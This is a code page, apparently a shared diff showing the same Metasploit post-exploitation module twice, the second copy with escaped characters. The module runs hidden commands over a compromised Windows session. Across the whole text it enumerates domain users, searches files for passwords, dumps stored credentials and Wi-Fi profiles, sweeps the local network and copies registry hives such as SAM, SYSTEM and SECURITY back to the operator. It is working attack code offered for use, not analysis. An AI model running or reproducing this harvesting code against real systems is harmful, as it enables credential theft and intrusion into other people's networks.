pwneddesal · June 17, 2022 02:54
diff --git a/extrarecon.rb b/extrarecon.rb
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core/post/windows/powershell'
 require 'fileutils'
 class MetasploitModule < Msf::Post
 	include Msf::Post::Windows::Powershell
 	def initialize(info={})
 		super(update_info(info,
 		'Name' => 'PowerShell Domain User Enumeration',
 		'Description' => %q{
 		This module will enumerate user accounts in the default
 		domain using PowerShell.
 		},
 		'License' => MSF_LICENSE,
 		'Author' => [ 'Daniel Teixeira' ],
 		'Platform' => [ 'win'],
 		'SessionTypes' => [ 'meterpreter' ]
 		))
 		# Extract the host and port
 		#self.host,self.port = client.session_host, client.session_port
 		#print_status("New session on #{host}:#{port}...")
 		# Create a directory for the logs
 		

 	end
 	def run
 		host=client.session_host
 		logs = ::File.join(Msf::Config.log_directory, 'post','scraper', host,Time.now.strftime("%Y%m%d.%M%S")+sprintf("%.5d",rand(100000)))
 		::FileUtils.mkdir_p(logs)
 		#Active directory users
 		print_status('Retriving Active Directory users!!!!')
 		user_enum = '([adsisearcher]"objectcategory=user").findall() | foreach {$_.Path} | ForEach-Object { $_.Split("=,")[1]}'
 		save_log(client,logs,'users.txt',user_enum,true)
 		#Searching some password files
 		print_status('Searching some files')
 		find_file="findstr /sipass *.xml *.ini *.txt"
 		save_log(client,logs,'search_filename.txt',find_file)
 		#Gathering info about connected access points
 		print_status('Gathering info about connected access points')
 		netsh_enum="netsh wlan show profile"
 		save_log(client,logs,"AccessPoints.txt",netsh_enum)
 		#arp to icmp
 		print_status('ARP to ping')
 		arp2toping_enum='$ping = New-Object System.Net.NetworkInformation.Ping;arp -a | % { $_.ToString().Trim().Split(" ")[0] } | Select-String "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" | ForEach {Write-Output $_,$ping.Send($_).Status,"_____________"}'
 		result=save_log(client,logs,"arp2icmp.txt",arp2toping_enum,true)
 		print_status('Here is the arp table ')
 		print_status(result)
 		#stored_credentials
 		print_status('Retriving stored credentials')
 		stored_credentials_enum='cmdkey /list'
 		save_log(client,logs,'stored_credentials.txt',stored_credentials_enum)
 		#Harvesting files
 		print_status('Harvesting Files')
 		##create a directory for retrived files
 		commands=['$Env:systemdrive\boot.ini',
 			'$Env:windir\win.ini',
 			'$Env:windir\System32\drivers\etc\hosts',
 			'$Env:systemdrive\pagefile.sys',
 			'$Env:windir\debug\NetSetup.log',
 			'$Env:windir\repair\sam',
 			'$Env:windir\repair\system',
 			'$Env:windir\repair\software',
 			'$Env:windir\repair\security',
 			'$Env:windir\iis6.log',
 			'$Env:windir\system32\config\AppEvent.Evt',
 			'$Env:windir\system32\config\SecEvent.Evt',
 			'$Env:windir\system32\config\default.sav',
 			'$Env:windir\system32\config\security.sav',
 			'$Env:windir\system32\config\software.sav',
 			'$Env:windir\system32\config\system.sav',
 			'$Env:windir\system32\CCM\logs\*.log',
 			'$Env:userprofile\ntuser.dat',
 			'$Env:userprofile\LocalS~1\Tempor~1\Content.IE5\index.dat',
 			'$Env:windir\System32\drivers\etc\hosts']
 		file_names=[]
 		harvested_dir=logs + "/harvested"
 		::FileUtils.mkdir_p(harvested_dir)
 		commands.each{ |cmd|
 			save_log(client,harvested_dir,cmd+".txt","type " + cmd,true)
 		}
 		#save_log(client,logs,'utot.txt','type $Env:windir\System32\drivers\etc\hosts',true)
 		print_good("Finished! see #{logs}")

 	end
 	def m_exec(client, cmd)
 		begin
 			r = client.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
 			b = ""
 			while(d = r.channel.read)
 				b << d
 				break if d == ""
 			end
 			r.channel.close
 			r.close
 			b
 		rescue ::Exception => e
 			print_error("Failed to run command #{cmd}")
 			print_error("Error: #{e.class} #{e}")
 			end
 		end
 	def save_log(client,logs,txtfile,command,powershell=false)
 		result=""
 		::File.open(File.join(logs,txtfile),"w") do |fd|
 			if powershell==true
 				result=psh_exec(command,greedy_kill=false)
 				fd.puts(result)
 			elsif powershell==false
 				result=m_exec(client,command)
 				fd.puts(result)
 			end
 		end
 		result
 	end
 end
	##
	# This module requires Metasploit: http://metasploit.com/download
	# Current source: https://github.com/rapid7/metasploit-framework
	##
	require 'msf/core/post/windows/powershell'
	require 'fileutils'
	class MetasploitModule < Msf::Post
	include Msf::Post::Windows::Powershell
	def initialize(info={})
	super(update_info(info,
	'Name' => 'PowerShell Domain User Enumeration',
	'Description' => %q{
	This module will enumerate user accounts in the default
	domain using PowerShell.
	},
	'License' => MSF_LICENSE,
	'Author' => [ 'Daniel Teixeira' ],
	'Platform' => [ 'win'],
	'SessionTypes' => [ 'meterpreter' ]
	))
	# Extract the host and port
	#self.host,self.port = client.session_host, client.session_port
	#print_status("New session on #{host}:#{port}...")
	# Create a directory for the logs


	end
	def run
	host=client.session_host
	logs = ::File.join(Msf::Config.log_directory, 'post','scraper', host,Time.now.strftime("%Y%m%d.%M%S")+sprintf("%.5d",rand(100000)))
	::FileUtils.mkdir_p(logs)
	#Active directory users
	print_status('Retriving Active Directory users!!!!')
	user_enum = '([adsisearcher]"objectcategory=user").findall() \| foreach {$_.Path} \| ForEach-Object { $_.Split("=,")[1]}'
	save_log(client,logs,'users.txt',user_enum,true)
	#Searching some password files
	print_status('Searching some files')
	find_file="findstr /sipass .xml .ini *.txt"
	save_log(client,logs,'search_filename.txt',find_file)
	#Gathering info about connected access points
	print_status('Gathering info about connected access points')
	netsh_enum="netsh wlan show profile"
	save_log(client,logs,"AccessPoints.txt",netsh_enum)
	#arp to icmp
	print_status('ARP to ping')
	arp2toping_enum='$ping = New-Object System.Net.NetworkInformation.Ping;arp -a \| % { $_.ToString().Trim().Split(" ")[0] } \| Select-String "(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)" \| ForEach {Write-Output $_,$ping.Send($_).Status,"_____________"}'
	result=save_log(client,logs,"arp2icmp.txt",arp2toping_enum,true)
	print_status('Here is the arp table ')
	print_status(result)
	#stored_credentials
	print_status('Retriving stored credentials')
	stored_credentials_enum='cmdkey /list'
	save_log(client,logs,'stored_credentials.txt',stored_credentials_enum)
	#Harvesting files
	print_status('Harvesting Files')
	##create a directory for retrived files
	commands=['$Env:systemdrive\boot.ini',
	'$Env:windir\win.ini',
	'$Env:windir\System32\drivers\etc\hosts',
	'$Env:systemdrive\pagefile.sys',
	'$Env:windir\debug\NetSetup.log',
	'$Env:windir\repair\sam',
	'$Env:windir\repair\system',
	'$Env:windir\repair\software',
	'$Env:windir\repair\security',
	'$Env:windir\iis6.log',
	'$Env:windir\system32\config\AppEvent.Evt',
	'$Env:windir\system32\config\SecEvent.Evt',
	'$Env:windir\system32\config\default.sav',
	'$Env:windir\system32\config\security.sav',
	'$Env:windir\system32\config\software.sav',
	'$Env:windir\system32\config\system.sav',
	'$Env:windir\system32\CCM\logs\*.log',
	'$Env:userprofile\ntuser.dat',
	'$Env:userprofile\LocalS~1\Tempor~1\Content.IE5\index.dat',
	'$Env:windir\System32\drivers\etc\hosts']
	file_names=[]
	harvested_dir=logs + "/harvested"
	::FileUtils.mkdir_p(harvested_dir)
	commands.each{ \|cmd\|
	save_log(client,harvested_dir,cmd+".txt","type " + cmd,true)
	}
	#save_log(client,logs,'utot.txt','type $Env:windir\System32\drivers\etc\hosts',true)
	print_good("Finished! see #{logs}")

	end
	def m_exec(client, cmd)
	begin
	r = client.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
	b = ""
	while(d = r.channel.read)
	b << d
	break if d == ""
	end
	r.channel.close
	r.close
	b
	rescue ::Exception => e
	print_error("Failed to run command #{cmd}")
	print_error("Error: #{e.class} #{e}")
	end
	end
	def save_log(client,logs,txtfile,command,powershell=false)
	result=""
	::File.open(File.join(logs,txtfile),"w") do \|fd\|
	if powershell==true
	result=psh_exec(command,greedy_kill=false)
	fd.puts(result)
	elsif powershell==false
	result=m_exec(client,command)
	fd.puts(result)
	end
	end
	result
	end
	end